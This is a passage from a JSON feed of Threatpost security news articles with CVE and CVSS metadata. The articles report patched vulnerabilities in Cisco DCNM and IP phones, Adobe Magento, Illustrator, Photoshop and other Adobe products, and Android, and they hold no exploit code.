10.x.\u201d\n\nCisco has released software updates that address the vulnerability, though there are no workarounds that address the flaw.\n\nCisco also patched five high-severity flaws in DCNM, including two command-injection flaws ([CVE-2020-3377](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-devmgr-cmd-inj-Umc8RHNh>) and[ CVE-2020-3384](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-rest-inj-BCt8pwAJ>) ) that could allow an authenticated, remote attacker to inject arbitrary commands on affected devices; a path traversal issue ([CVE-2020-3383](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-path-trav-2xZOnJdR>)) that could enable an authenticated, remote attacker to conduct directory traversal attacks on vulnerable devices; an improper authorization flaw ([CVE-2020-3386](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-improper-auth-7Krd9TDT>)), allowing an authenticated, remote attacker with a low-privileged account to bypass authorization on the API of an affected device; and an authentication bypass glitch ([CVE-2020-3376](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-auth-bypass-JkubGpu3>)) allowing an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions on an affected device.\n\nDCNM came in the spotlight [earlier this year](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) when [three critical vulnerabilities](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>) (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977) were discovered in the tool in January. Two critical flaws [were also found last year in DCNM,](<https://threatpost.com/cisco-warns-of-critical-flaws-in-data-center-network-manager/146050/>) which could allow attackers to take control of impacted systems.\n\nCisco on Wednesday [also patched a critical vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uabvman-SYGzt8Bv>) (CVE-2020-3374) in the web-based management interface of its SD-WAN vManage Network Management system (the centralized management platform). This flaw could allow a remote attacker to bypass authorization, enabling them to access sensitive information, modify the system configuration, or impact the availability of the affected system \u2013 but the attacker would need to be authenticated to exploit the flaw.\n\n**_Complimentary Threatpost Webinar__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c__[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)__\u201d brings top cloud-security experts together to explore how __Confidential Computing__ is a game changer for securing dynamic cloud data and preventing IP exposure. Join us __[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) __for this__ FREE __live webinar._**\n", "cvss3": {}, "published": "2020-07-30T14:36:36", "type": "threatpost", "title": "Critical, High-Severity Cisco Flaws Fixed in Data Center Network Manager", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3374", "CVE-2020-3376", "CVE-2020-3377", "CVE-2020-3382", "CVE-2020-3383", "CVE-2020-3384", "CVE-2020-3386"], "modified": "2020-07-30T14:36:36", "id": "THREATPOST:5548F4E3E237D384BA67561D3FCBB730", "href": "https://threatpost.com/critical-high-severity-cisco-flaws-fixed-data-center-network-manager/157861/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:16:03", "description": "Critical flaws in Adobe\u2019s Magento e-commerce platform \u2013 which is commonly targeted by attackers like the [Magecart cybergang](<https://threatpost.com/magecart-blue-bear-attack/151585/>) \u2013 could enable arbitrary code execution on affected systems.\n\nMagento is a popular, Adobe-owned open-source e-commerce platform that powers many online shops. Adobe on Tuesday released security updates for flaws affecting Magento Commerce 2 and Magento Open Source 2, versions 2.3.5-p1 and earlier. These included two critical vulnerabilities and two important-severity flaws.\n\n\u201cSuccessful exploitation could lead to arbitrary code execution and signature verification bypass,\u201d according to Adobe.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe critical flaws include a path traversal flaw (CVE-2020-9689) that could enable arbitrary code execution. Path traversal attacks essentially allow attackers to trick a web application into reading the files and directories that are stored outside the web root folder. Another critical vulnerability (CVE-2020-9692) is a security mitigation bypass, which could also allow arbitrary code execution. For both of these flaws, an attacker needs administrative privileges to exploit the vulnerability.\n\nAdobe also patched an important-severity observable timing discrepancy, which could enable signature verification bypass (CVE-2020-9690). [According to Mitre](<https://cwe.mitre.org/data/definitions/208.html>), an observable timing discrepancy is when two separate operations require different amounts of time to complete \u2013 in a way that is observable to an attacker \u2013 which reveals security-relevant information about the vulnerable product.\n\nFinally, an important-severity, DOM-based cross-site scripting issue could allow arbitrary code execution. An attacker would not need to be authenticated to abuse this flaw \u2013 meaning that it is exploitable without credentials.\n\nUsers are urged to update to Magento Commerce 2 versions 2.4.0 or 2.3.5-p2, and Magento Open Source 2 versions 2.4.0 or 2.3.5-p2. The update for all vulnerabilities is a priority 2, meaning they exist in a product that has historically been at elevated risk \u2013 but for which there are currently no known exploits.\n\n\u201cBased on previous experience, we do not anticipate exploits are imminent. As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days),\u201d said Adobe.\n\nMagento has had its share of security flaws over the past year. In April Adobe [patched several critical flaws](<https://helpx.adobe.com/security/products/magento/apsb20-22.html>) in Magento, which if exploited could lead to arbitrary code execution or information disclosure. The most serious of these include critical command infection flaws (CVE-2020-9576, CVE-2020-9578, CVE-2020-9582, CVE-2020-9583) and critical security mitigation bypass vulnerabilities (CVE-2020-9579, CVE-2020-9580). Adobe also issued patches in January as part of its overall release of the [Magento 2.3.4 upgrade](<https://magento.com/blog/magento-news/magento-2.3.4-building-more-engaging-customer-experiences>), giving the fixes a \u201cpriority 2\u201d rating.\n\nThe issue also comes after Magento 1 reached end-of-life (EOL) in June, with Adobe making a last-ditch effort to urge the 100,000 online stores still running the outdated version to migrate to Magento 2. E-commerce merchants must [migrate to Magento 2](<https://magento.com/blog/magento-news/support-magento-1-software-ends-june-30-2020>), which was released five years ago.\n\n**_Complimentary Threatpost Webinar__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c__[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)__\u201d brings top cloud-security experts together to explore how __Confidential Computing__ is a game changer for securing dynamic cloud data and preventing IP exposure. Join us __[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) __for this__ FREE __live webinar._**\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-07-29T21:22:00", "type": "threatpost", "title": "Critical Magento Flaws Allow Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135", "CVE-2020-9576", "CVE-2020-9578", "CVE-2020-9579", "CVE-2020-9580", "CVE-2020-9582", "CVE-2020-9583", "CVE-2020-9689", "CVE-2020-9690", "CVE-2020-9692"], "modified": "2020-07-29T21:22:00", "id": "THREATPOST:F1B41E6C07BCAD79CFBB003B91DF332F", "href": "https://threatpost.com/critical-magento-flaws-code-execution/157840/", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T23:24:19", "description": "Google has released an update stomping out three critical-severity vulnerabilities in its Android operating system \u2014 one of which could result in \u201cpermanent denial of service\u201d on affected mobile devices if exploited.\n\nThe vulnerabilities are part of Google\u2019s December 2019 Android Security Bulletin, which deployed fixes for critical, high and medium-severity vulnerabilities tied to 15 CVEs overall. Qualcomm, whose chips are used in Android devices, also patched 22 critical and high-severity vulnerabilities.\n\n\u201cThe most severe of these issues is a critical security vulnerability in the Framework component that could enable a remote attacker using a specially crafted message to cause a permanent denial of service,\u201d according to Google\u2019s [Monday update](<https://source.android.com/security/bulletin/2019-12-01>). That DoS flaw, CVE-2019-2232, has been addressed for devices running on versions 8.0, 8.1, 9 and 10 of the Android operating system, Google said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe other two critical flaws (CVE-2019-2222 and CVE-2019-2223) exist in Android\u2019s Media framework. This framework includes support for playing a variety of common media types, so that users can easily utilize audio, video and images. Android devices running on operating systems versions 8.0, 8.1,9 and 10 have been addressed for these two bugs, which could enable a remote attacker using a crafted file to execute code within the context of a privileged process.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/12/03113210/ADNROID-UPDATE.png>)\n\nClick to enlarge.\n\nAlso fixed were three high-severity elevation-of-privilege flaws (CVE-2019-9464, CVE-2019-2217 and CVE-2019-2218) as well as a high-severity information disclosure glitch (CVE-2019-2220) in the Android framework. And, seven high-severity flaws \u2013 including remote-code-execution, elevation-of-privilege and information-disclosure vulnerabilities \u2013 were discovered in the Android operating system.\n\nMeanwhile, 22 CVEs \u2013 including three critical buffer overflow flaws \u2013 were also patched, related to Qualcomm closed-source components, which are used in Android devices. The [critical severity flaws](<https://www.qualcomm.com/company/product-security/bulletins/december-2019-bulletin>) exist across various Qualcomm technologies, including the multi-mode call processor (CVE-2019-10500), Wideband Code Division Multiple Access, an alternative to 2G/3G technology developed by Qualcomm, (CVE-2019-10525) and a modem (CVE-2019-2242). Finally, Google issued fixes for various other third-party components in its Android ecosystem, including a high-severity elevation-of-privilege vulnerability (CVE-2018-20961) in the USB MIDI class function driver used in Android\u2019s kernel component.\n\nThere are no current reports of these vulnerabilities being exploited in the wild.\n\n## Manufacturer Updates\n\nManufacturers of Android devices typically push out their own patches to address updates in tandem with or after the Google Security Bulletin.\n\nSamsung said in a [December security maintenance release](<https://security.samsungmobile.com/securityUpdate.smsb>) that it is releasing several of the Android security bulletin patches, including those addressing critical flaws, CVE-2019-2232, CVE-2019-2222 and CVE-2019-2223, to major Samsung models. Meanwhile LG [also rolled out patches](<https://lgsecurity.lge.com/>) covered by the December security bulletin (also addressing the three critical Android flaws as well).\n\nA [bulletin said](<https://source.android.com/security/bulletin/pixel>) a security update for Pixel devices, which run on Google\u2019s Android operating system, is \u201ccoming soon.\u201d Threatpost has reached out to Google for more details around this timeline.\n\nGoogle\u2019s update comes as out-of-date Android devices continue to face threats, including a new [Android vulnerability disclosed this week](<https://threatpost.com/strandhogg-vulnerability-allows-malware-to-pose-as-legitimate-android-apps/150750/>), called \u201cStrandHogg,\u201d which could allow malware to pose as popular apps and ask for various permissions, potentially allowing hackers to listen in on users, take photos, read and send SMS messages.\n\nIn a security notice, the Multi-State Information Sharing and Analysis Center urged Android users to \u201cApply appropriate updates by Google Android or mobile carriers to vulnerable systems, immediately after appropriate testing\u201d in accordance with the security update bulletin.\n", "cvss3": {}, "published": "2019-12-03T17:18:47", "type": "threatpost", "title": "Critical Android Flaw Leads to 'Permanent DoS\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-20961", "CVE-2019-10500", "CVE-2019-10525", "CVE-2019-2217", "CVE-2019-2218", "CVE-2019-2220", "CVE-2019-2222", "CVE-2019-2223", "CVE-2019-2232", "CVE-2019-2242", "CVE-2019-9464", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-12-03T17:18:47", "id": "THREATPOST:9E04149817EE094AADC1268A47208E10", "href": "https://threatpost.com/google-critical-android-permanent-dos-flaw/150764/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T23:26:39", "description": "Adobe Systems is warning Illustrator 2019 users that two critical memory-corruption vulnerabilities could allow for an attacker to remotely connect to a Windows machine, execute code and gain control of the targeted system.\n\nThe create-suite behemoth also warned Tuesday, as part of its [regular monthly patch advisories](<https://blogs.adobe.com/psirt/?p=1801>), that its Windows and macOS versions of its Adobe Media Encoder also have a critical vulnerability tied to an out-of-bounds write flaw.\n\n\n\nAdobe said none of the critical bugs, nor an additional eight vulnerabilities rated important and identified Tuesday, have been exploited in the wild.\n\n**Adobe Illustrator 2019**\n\nThree security updates available for Adobe Illustrator 2019 affect version Windows 23.1 and earlier. The most serious of the bugs ([CVE-2019-8247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8247>), [CVE-2019-8248 ](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8248>)) are both remote code execution flaws. Adobe did not go into technical detail of either bug. Mitigation includes updating to the latest version (24.0) of the software, according to the bulletin.\n\nLike both critical bugs, the additional important Illustrator vulnerability ([CVE-2019-7962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7962>)) is also found in the Windows 23.1 and earlier versions of the software.\n\nKushal Arvind Shah of Fortinet\u2019s FortiGuard Labs are credited for finding both the critical bugs.\n\n**Adobe Media Encoder **\n\nThe free application Adobe Media Encoder, used with Adobe Premiere Pro and Adobe After Effects to transcode video suitable for the web, also received a critical fix ([CVE-2019-8246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8246>)). Affected was the 13.1 version of the software compatible with both the Windows and macOS operating systems.\n\nThe fixes for the additional important Media Encoder bugs ([CVE-2019-8241](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8241>), [CVE-2019-8242](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8242>), [CVE-2019-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8243>), [CVE-2019-8244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8244>)), resolve multiple file parsing vulnerabilities. Successful exploitation could lead to information disclosure in the context of the current user, according to Adobe.\n\nWen Guang Jiao of Qihoo 360 Core Security is credited for finding the critical RCE bug. Adobe is urging customers to upgrade to the 14.0 version of the software.\n\n**Adobe Bridge and Animate**\n\nAdobe Bridge also received a number of important updates ([CVE-2019-8239](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8239>), [CVE-2019-8240](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8240>)), impacting both the Windows and macOS 9.1 versions of the software. Mitigation includes updating to the 10.0 version of Adobe Bridge.\n\n\u201cThis update addresses multiple vulnerabilities rated important that occur when parsing malformed SVG images. Successful exploitation could lead to information disclosure in the context of the current user,\u201d wrote Adobe.\n\nAdobe is also warning that its Animate (version 19.2.1) software for Windows is also vulnerable to a security flaw rated important. The bug ([CVE-2019-7960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7960>)) is an \u201cinsecure library loading vulnerability that could lead to privilege escalation,\u201d according to the company.\n\nResearcher Youngjun Liu of Nsfocus is credited for discovering and reporting the Animate bug.\n\n**Insecure Defaults in Adobe\u2019s Mobile SDKs**\n\nThe Tuesday Adobe security bulletin [did not address an insecure defaults issue](<https://wwws.nightwatchcybersecurity.com/2019/11/06/insecure-defaults-in-adobes-mobile-sdks/>) with with its Adobe\u2019s mobile SDK found last week by researchers behind the Nightwatch Cybersecurity blog. That Adobe issue was addressed last week with the company stating:\n\n\u201cAdobe worked with the researcher who brought this matter to our attention to remediate the findings. Adobe released new versions of the mobile SDKs, which can be found here: <https://github.com/Adobe-Marketing-Cloud/acp-sdks>. The SDKs are configurable in Adobe Experience Platform Launch and require SSL for data transmission.\u201d\n\nNightwatch Cybersecurity had found that some default configuration files, provided by Adobe within its mobile SDKs, include several insecure options. If developers failed to change those default configuration options than corresponding live code could also be insecure.\n\n**_What are the top risks to modern enterprises in the peak era of data breaches? Find out: Join breach expert Chip Witt from SpyCloud and Threatpost senior editor Tara Seals, in our upcoming free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_, \u201cTrends in Fortune 1000 Breach Exposure.\u201d _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-11-12T18:10:18", "type": "threatpost", "title": "Adobe Patches Critical Bugs in Illustrator, Media Encoder", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-7960", "CVE-2019-7962", "CVE-2019-8239", "CVE-2019-8240", "CVE-2019-8241", "CVE-2019-8242", "CVE-2019-8243", "CVE-2019-8244", "CVE-2019-8246", "CVE-2019-8247", "CVE-2019-8248", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-11-12T18:10:18", "id": "THREATPOST:15D2E9F142FD01B0FB329D7E3179F0E4", "href": "https://threatpost.com/adobe-critical-bugs-illustrator-media-encoder/150114/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:16:26", "description": "Adobe released a slew of patches for critical vulnerabilities Tuesday that were part of an out-of-band security update. Several of the critical flaws are tied to Adobe\u2019s popular Photoshop photo-editing software and allow adversaries to execute arbitrary code on targeted Windows devices.\n\nOverall, Adobe issued patches for flaws tied to 12 CVEs across Bridge, Prelude and Photoshop applications. The unscheduled updates come a week after Adobe issued its [official July 2020 security updates](<https://threatpost.com/adobe-critical-code-execution-bugs-july/157420/>), including critical code-execution bugs.\n\nAdobe said it was not aware of any exploits in the wild for any of the bugs patched in the update. The company did not offer technical details regarding the Photoshop CVEs.\n\nThreatpost reached out to Mat Powell, researcher with Trend Micro\u2019s Zero Day Initiative, who is credited for finding each of the critical flaws. Powell has not responded to that request. Threatpost hopes to update this report with additional commentary from the researcher.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAll of the reported critical flaws stem from out-of-bounds read and write vulnerabilities, which occur when the software reads data past the end of \u2013 or before the beginning of \u2013 the intended buffer, potentially resulting in corruption of sensitive information, a crash, or code execution among other things.\n\n[Adobe Photoshop](<https://helpx.adobe.com/security/products/photoshop/apsb20-45.html>) features two out-of-bounds read flaws (CVE-2020-9683, CVE-2020-9686) and three out-of-bound write (CVE-2020-9684, CVE-2020-9685, CVE-2020-9687) issues. All of these could \u201clead to arbitrary code execution in the context of the current user,\u201d according to Adobe.\n\nThe Photoshop vulnerabilities affect Photoshop CC 2019 versions 20.0.9 and earlier and Photoshop 2020 21.2 and earlier (for Windows). Users can update to versions 20.0.10 and 21.2.1, respectively.\n\nAdobe has previously addressed various serious flaws in its Photoshop photo editing app, including [dozens of arbitrary code-execution issues](<https://threatpost.com/critical-adobe-photoshop-acrobat-reader-flaws/153902/>) in March \u2013 which addressed 22 CVEs in Photoshop overall, 16 of which were critical.\n\n## **Other Flaws**\n\nAlso fixed were [critical flaws tied to three CVEs in Bridge](<https://helpx.adobe.com/security/products/bridge/apsb20-44.html>), Adobe\u2019s asset management app. These include an out-of-bounds read flaw (CVE-2020-9675) and out-of-bounds write issues (CVE-2020-9674, CVE-2020-9676) that could enable code execution. Adobe Bridge versions 10.0.3 and earlier are affected; users can update to version 10.1.1 for a fix.\n\nAdobe also issued patches for critical vulnerabilities [in its Prelude app](<https://helpx.adobe.com/security/products/prelude/apsb20-46.html>), which works with its Premiere Pro video editing app to allow users to tag media with metadata for searching, post-production workflows, and footage lifecycle management.\n\nPrelude contains out-of-bounds read (CVE-2020-9677, CVE-2020-9679) and out-of-bounds write (CVE-2020-9678, CVE-2020-9680) glitches that can allow code execution. Adobe Preluade versions 9.0 and earlier for Windows are affected; users can update to version 9.0.1.\n\nPowell was also credited with reporting the additional critical flaws.\n\nAdobe also issued patches for [an \u201cimportant\u201d severity flaw](<https://helpx.adobe.com/security/products/reader-mobile/apsb20-50.html>) in Adobe Reader Mobile for Android, which allows users to view and edit PDFs from their smartphones. The application has a directory traversal issue (CVE-2020-9663) enabling information disclosure in the context of the current user. Adobe Reader Mobile for Android, versions 20.0.1 and earlier are impacted. Users can update to version 20.3 (for all Android versions).\n", "cvss3": {}, "published": "2020-07-21T15:06:50", "type": "threatpost", "title": "Critical Adobe Photoshop Flaws Patched in Emergency Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9663", "CVE-2020-9674", "CVE-2020-9675", "CVE-2020-9676", "CVE-2020-9677", "CVE-2020-9678", "CVE-2020-9679", "CVE-2020-9680", "CVE-2020-9683", "CVE-2020-9684", "CVE-2020-9685", "CVE-2020-9686", "CVE-2020-9687"], "modified": "2020-07-21T15:06:50", "id": "THREATPOST:935FDBA342DDD020D66B791DBE0AEA4D", "href": "https://threatpost.com/critical-adobe-photoshop-flaws-patched-in-emergency-update/157581/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:47", "description": "Adobe has released its scheduled July 2020 security updates, covering flaws in five different product areas: Creative Cloud Desktop; Media Encoder; Download Manager; Genuine Service; and ColdFusion.\n\nFour of the bugs are rated critical in severity, with the others ranked as important. Most of the important flaws involve privilege escalation, with the critical bugs opening the door to more dangerous attacks.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cUpdates to both Adobe Download Manager and Media Encoder address critical vulnerabilities (CVE-2020-9688, 9646, and 9650) that could lead to arbitrary code execution,\u201d Justin Knapp, product marketing manager at Automox, told Threatpost. \u201cThe fourth critical vulnerability (CVE-2020-9682) impacts Creative Cloud Desktop, and if exploited, could allow an attacker to create or modify files.\u201d\n\n**Creative Cloud Desktop**\n\nAdobe has [released patches](<https://helpx.adobe.com/security/products/creative-cloud/apsb20-33.html>) for four different flaws in its Creative Cloud Desktop Application for Windows, including a critical flaw allowing arbitrary file system writes.\n\nCreative Cloud is a suite of apps and services for creating and processing video, design, photography and web art. Affected versions of the product include Creative Cloud Desktop Application 5.1 and earlier, Adobe noted in its scheduled monthly security update on Tuesday.\n\nThe critical flaw is a symbolic link (symlink) vulnerability (CVE-2020-9682) that could allow an attacker with a successful exploit to create or modify a file in a location they could not normally access. Symlinks are shortcuts to other files.\n\n\u201cWhile this is a critical vulnerability, Adobe has ranked it a 2, which means these systems could be at an increased risk based on past history, then again for this particular vulnerability there are no current known exploits,\u201d said Jimmy Graham, senior director of product management, after reviewing the advisory.\n\nThe patches also address three important-rated security bugs, all of which could lead to privilege escalation in the context of the current user. The bug tracked as CVE-2020-9669 is caused due to a lack of exploit mitigations; CVE-2020-9671 is caused via insecure file permissions; and CVE-2020-9670 is another, less severe symlink vulnerability.\n\nAcknowledgements for finding the flaws went to Xavier Danest of Decathlon (CVE-2020-9671); and Zhongcheng Li of Topsec Alpha Team (CVE-2020-9669, CVE-2020-9670 and CVE-2020-9682).\n\n**Media Encoder**\n\nAdobe also released [an update](<https://helpx.adobe.com/security/products/media-encoder/apsb20-36.html>) for Adobe Media Encoder for Windows, 14.2 and earlier versions. Media Encoder is part of Adobe\u2019s video-editing suite and is responsible for converting video files to the proper format to ensure they play well on different kinds of devices.\n\nThe advisory addresses two critical out-of-bounds write bugs (CVE-2020-9650 and CVE-2020-9646) that could lead to arbitrary code execution; and an important out-of-bound read (CVE-2020-9649) that could allow information disclosure in the context of the current user.\n\n\u201cOn its own, arbitrary code-execution exploits are limited in scope to the privilege of the affected process, but when combined with privilege escalation vulnerabilities it can allow an attacker to quickly escalate a process\u2019s privileges and execute code on the target system giving the attacker full control over the device,\u201d Knapp said.\n\nAdobe credited the Trend Micro Zero Day Initiative for reporting the issues.\n\n**Download Manager**\n\nAlso among the security fixes is [a patch](<https://helpx.adobe.com/security/products/adm/apsb20-49.html>) for a critical vulnerability that could lead to arbitrary code-execution in Adobe Download Manager for Windows. The bug (CVE-2020-9688) affects version 2.0.0.518 of the platform.\n\nThe issue allows for command injection if exploited, which could ultimately open the door to arbitrary code-execution.\n\nSecurity researcher Dhiraj Mishra (@RandomDhiraj) reported the issue.\n\n**Genuine Service**\n\nThe Adobe Genuine Service for Windows and macOS meanwhile, which periodically validates already-installed Adobe software to root out incorrect and invalid licenses, and pirated software, has three important vulnerabilities.\n\nThese could all lead to privilege escalation in the context of the current user. They include two insecure library loading bugs (CVE-2020-9667 and CVE-2020-9681); and one is a result of the mishandling of symlinks (CVE-2020-9668)\n\nThey affect Genuine Service versions 6.6 and earlier versions, according to [Adobe\u2019s update](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>).\n\nAdobe credited Adrian Denkiewicz from CQURE (CVE-2020-9667) and Topsec Alpha Team\u2019s Li (CVE-2020-9668, CVE-2020-9681) for the finds.\n\n**Adobe ColdFusion**\n\nAnd finally, Adobe [also released](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>) patches for multiple important vulnerabilities in ColdFusion versions 2016 (Update 15 and earlier) and 2018 (Update 9 and earlier). ColdFusion is the vendor\u2019s popular platform for building and deploying web and mobile applications.\n\nTwo CVEs cover flaws allowing DLL search-order hijacking, leading to privilege escalation (CVE-2020-9672 and CVE-2020-9673). The bugs were reported by Nuttakorn Tungpoonsup and Ammarit Thongthua of the Secure D Center Research Team, along with Sittikorn Sangrattanapitak, an independent cybersecurity researcher.\n\nThe July patch update is light compared to [Adobe\u2019s usual slew of monthly security fixes](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>), but that may be because the company issued an out-of-band update for 18 critical vulnerabilities in mid-June. These impacted a [raft of key products](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>), including Adobe After Effects, Illustrator, Premiere Pro, Premiere Rush and Audition. With successful exploits, the flaws would allow attackers to execute arbitrary code.\n\n\u201cThe Adobe bulletin list for this month is pretty light and none of the more high-profile targets are included,\u201d Chris Goettl, director of product management for security at Ivanti, told Threatpost. \u201cFlash player has a release as well, but it is not security-related. Adobe Acrobat and Reader were updated in May so it is likely we will see the due for some attention in the August patch cycle.\u201d\n\nAs for July\u2019s updates, administrators should nonetheless prioritize applying the patches ASAP, Knapp said.\n\n\u201cWith the average organization taking 107 days to patch a new vulnerability, it is likely that there are now many organizations with both arbitrary code-execution and privilege-escalation vulnerabilities present on corporate devices that could create a perfect storm for attackers to exploit,\u201d he told Threatpost.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-14T17:02:03", "type": "threatpost", "title": "Adobe Discloses Critical Code-Execution Bugs in July Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9646", "CVE-2020-9649", "CVE-2020-9650", "CVE-2020-9667", "CVE-2020-9668", "CVE-2020-9669", "CVE-2020-9670", "CVE-2020-9671", "CVE-2020-9672", "CVE-2020-9673", "CVE-2020-9681", "CVE-2020-9682", "CVE-2020-9688"], "modified": "2020-07-14T17:02:03", "id": "THREATPOST:C22F1F8B7AB3041436E903528767C174", "href": "https://threatpost.com/adobe-critical-code-execution-bugs-july/157420/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:21:15", "description": "Cisco is warning of a critical flaw in the web server of its IP phones. If exploited, the flaw could allow an unauthenticated, remote attacker to execute code with root privileges or launch a denial-of-service (DoS) attack.\n\nProof-of-concept (PoC) exploit code has been posted [on GitHub](<https://github.com/tenable/poc/blob/master/cisco/ip_phone/cve_2020_3161.txt>) for the vulnerability ([CVE-2020-3161](<https://nvd.nist.gov/vuln/detail/CVE-2020-3161>)), which ranks 9.8 out of 10 on the CVSS scale. Cisco issued patches in a [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs>) for the flaw, which affects various versions of its Cisco IP phones for small- to medium-sized businesses.\n\nAccording to Jacob Baines with Tenable, [who discovered the flaw](<https://www.tenable.com/security/research/tra-2020-24>), Cisco IP phone web servers lack proper input validation for HTTP requests. To exploit the bug, an attacker could merely send a crafted HTTP request to the /deviceconfig/setActivationCode endpoint (on the web server of the targeted device).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis triggers a stack-based buffer overflow due to the lack of input validation: \u201cIn libHTTPService.so, the parameters after /deviceconfig/setActivationCode are used to create a new URI via a sprintf function call. The length of the parameter string is not checked,\u201d according to Baines.\n\nThe end result is the attacker being able to crash the device, or even potentially execute code remotely.\n\nAffected products include: IP Phone 7811, 7821, 7841, and 7861 Desktop Phones; IP Phone 8811, 8841, 8845, 8851, 8861, and 8865 Desktop Phones; Unified IP Conference Phone 8831 and Wireless IP Phone 8821 and 8821-EX.\n\nOf note, according to Cisco, [some of these products](<https://www.cisco.com/c/en/us/products/collaboration-endpoints/wireless-ip-phone-8821/index.html>) (particularly the Wireless IP Phone 8821 and 8821-EX) are utilized by the healthcare industry who are currently on the frontlines of the [coronavirus pandemic.](<https://threatpost.com/cyberattacks-healthcare-orgs-coronavirus-frontlines/154768/>)\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132716/cisco-critical-flaw-1.png>)\n\nCisco has also confirmed various products that aren\u2019t affected by the flaw[ on its website.](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs>) Beyond Cisco\u2019s patches, one mitigation for the flaw is disabling web access on the IP phones (in fact, web access is disabled by default on IP phones), according to Cisco.\n\nNew findings by Tenable\u2019s Baines also led Cisco to bump up the severity of a previously-discovered vulnerability (CVE-2016-1421) in its IP phones to critical on Wednesday. Previously the flaw was medium-severity ([ranking 5 out of 